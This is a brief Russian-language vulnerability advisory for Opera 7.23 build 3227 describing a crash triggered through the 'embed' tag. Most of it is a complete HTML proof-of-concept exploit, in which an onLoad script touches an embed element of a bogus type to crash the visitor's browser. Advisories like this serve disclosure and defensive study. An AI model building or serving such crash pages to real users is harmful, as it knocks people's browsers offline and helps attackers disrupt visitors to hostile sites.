Программа: Opera 7.23 build 3227 

Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя. 

Эксплоит: 

<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>

</head>
<body onLoad="dSend()">

<embed src="https://xakep.ru/wp-content/uploads/post/23736/" type="CCCC" name="crash" >
</embed>
</body>
</html>

Оставить мнение